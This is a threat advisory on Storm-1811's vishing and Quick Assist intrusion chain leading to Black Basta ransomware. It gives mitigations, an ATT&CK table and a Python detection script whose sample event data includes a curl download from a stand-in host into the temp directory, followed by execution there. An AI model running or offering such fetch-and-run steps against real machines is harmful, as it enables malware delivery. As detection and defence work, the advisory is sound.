EXECUTIVE SUMMARY
Researchers have recently observed the cybercriminal group Storm-1811 exploiting the client management tool Quick Assist in their social engineering attacks. Known for deploying Black Basta ransomware, Storm-1811 begins their campaign with voice phishing (vishing) to impersonate trusted entities such as Microsoft technical support or company IT professionals. This is followed by the delivery of malicious tools, including ScreenConnect and NetSupport Manager, alongside malware like Qakbot and Cobalt Strike, which ultimately leads to the deployment of Black Basta ransomware.
Storm-1811 leverages Quick Assist's functionality to gain unauthorized access to users' devices. Through vishing attacks, they persuade targets to initiate Quick Assist sessions, often under the guise of resolving technical issues. Once connected, the threat actors request control over the device, enabling them to execute malicious scripts via cURL commands to download and install various malware components. These components include Qakbot, which serves as a conduit for further malicious payloads, and remote monitoring tools like ScreenConnect and NetSupport Manager, which facilitate persistence and lateral movement within the compromised environment. The final stage involves deploying Cobalt Strike for hands-on-keyboard activities, culminating in the distribution of Black Basta ransomware using tools like PsExec.
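The chain above gives defenders a concrete correlation to hunt for: a Quick Assist session on a host, followed shortly by a download tool such as curl.exe fetching a URL, and then execution of something from the user's temp directory. The following is an added example written for this advisory, not code from the original report or from any vendor; the log format, field names, the 30-minute correlation window and the sample events are all constructed assumptions, so adapt the parser to whatever your EDR or Sysmon process-creation telemetry actually emits.

```python
"""Detection sketch: download tools and temp-directory execution shortly after Quick Assist starts.

Added example for this advisory; the event format and sample data are constructed, not real telemetry.
"""
import re
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, List


@dataclass
class Event:
    ts: datetime
    host: str
    user: str
    image: str      # full path of the created process
    parent: str     # parent process image name
    cmdline: str


@dataclass
class Alert:
    host: str
    user: str
    assist_started: datetime
    reason: str
    event: Event


# Constructed process-creation events: "timestamp|host|user|image|parent|cmdline".
# WS-0042 shows the pattern described in the advisory; WS-0077 is a benign curl call with no Quick Assist session.
SAMPLE_EVENTS = r"""
2024-05-14T10:02:11|WS-0042|alice|C:\Windows\System32\QuickAssist\QuickAssist.exe|explorer.exe|QuickAssist.exe
2024-05-14T10:05:40|WS-0042|alice|C:\Windows\System32\cmd.exe|explorer.exe|cmd.exe
2024-05-14T10:05:52|WS-0042|alice|C:\Windows\System32\curl.exe|cmd.exe|curl.exe -o C:\Users\alice\AppData\Local\Temp\update.zip https://example.invalid/p.zip
2024-05-14T10:06:30|WS-0042|alice|C:\Users\alice\AppData\Local\Temp\update.exe|cmd.exe|update.exe
2024-05-14T11:30:00|WS-0077|bob|C:\Windows\System32\curl.exe|powershell.exe|curl.exe https://intranet.example.invalid/health
"""

# Assumed tuning knobs: how long after Quick Assist starts we treat downloads as suspicious,
# and which download tools to watch (the advisory names cURL; extend to your environment's list).
WINDOW = timedelta(minutes=30)
DOWNLOAD_TOOLS = {"curl.exe"}
URL_PATTERN = re.compile(r"https?://", re.IGNORECASE)

REASON_DOWNLOAD = "download tool fetching a URL during Quick Assist session"
REASON_TEMP_EXEC = "process launched from user temp directory during Quick Assist session"


def basename(path: str) -> str:
    """Normalise a Windows path to its lower-cased file name."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def parse_events(text: str) -> List[Event]:
    """Parse the pipe-delimited constructed format into Events sorted by time."""
    events: List[Event] = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, host, user, image, parent, cmdline = line.split("|", 5)
        events.append(Event(datetime.fromisoformat(ts), host, user, image, parent, cmdline))
    return sorted(events, key=lambda e: e.ts)


def detect(text: str, window: timedelta = WINDOW) -> List[Alert]:
    """Correlate per host: remember when Quick Assist started, then flag downloads and temp execution inside the window."""
    assist_start: Dict[str, datetime] = {}
    alerts: List[Alert] = []
    for ev in parse_events(text):
        name = basename(ev.image)
        if name == "quickassist.exe":
            assist_start[ev.host] = ev.ts
            continue
        started = assist_start.get(ev.host)
        if started is None or ev.ts - started > window:
            continue  # no session on this host, or outside the correlation window
        if name in DOWNLOAD_TOOLS and URL_PATTERN.search(ev.cmdline):
            alerts.append(Alert(ev.host, ev.user, started, REASON_DOWNLOAD, ev))
        elif "/appdata/local/temp/" in ev.image.replace("\\", "/").lower():
            alerts.append(Alert(ev.host, ev.user, started, REASON_TEMP_EXEC, ev))
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"{a.event.ts} {a.host} {a.user}: {a.reason} -> {a.event.cmdline}")
```

The benign curl call on WS-0077 is never flagged because no Quick Assist session was seen on that host; tightening the window to a minute suppresses the WS-0042 hits as well, which is the lever to tune against your own false-positive rate. A production rule would also key on the Quick Assist session ending, and would treat ScreenConnect or NetSupport installers appearing in the same window as a second, higher-confidence signal.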
To mitigate the threat posed by Storm-1811, organizations are advised to consider blocking or uninstalling Quick Assist and similar remote management tools if they are not essential. Educating users about the risks of tech support scams and ensuring they only initiate Quick Assist sessions with verified support contacts can significantly reduce the risk of compromise. Additionally, leveraging advanced anti-phishing solutions, enabling network protection features, and maintaining up-to-date security defenses are crucial steps in safeguarding against this threat. By focusing on the stages leading up to ransomware deployment, organizations can effectively reduce the likelihood of successful attacks.
THREAT PROFILE:
| Tactic | Technique ID | Technique |
| --- | --- | --- |
| Initial Access | T1566 | Phishing |
| Execution | T1059 | Command and Scripting Interpreter |
| Privilege Escalation | T1078 | Valid Accounts |
| Defense Evasion | T1027 | Obfuscated Files or Information |
| Discovery | T1016 | System Network Configuration Discovery |
| Lateral Movement | T1021 | Remote Services |
| Collection | T1056 | Input Capture |
| Command and Control | T1071 | Application Layer Protocol |
| Exfiltration | T1041 | Exfiltration Over C2 Channel |
| Impact | T1486 | Data Encrypted for Impact |
REFERENCES:
The following reports contain further technical details: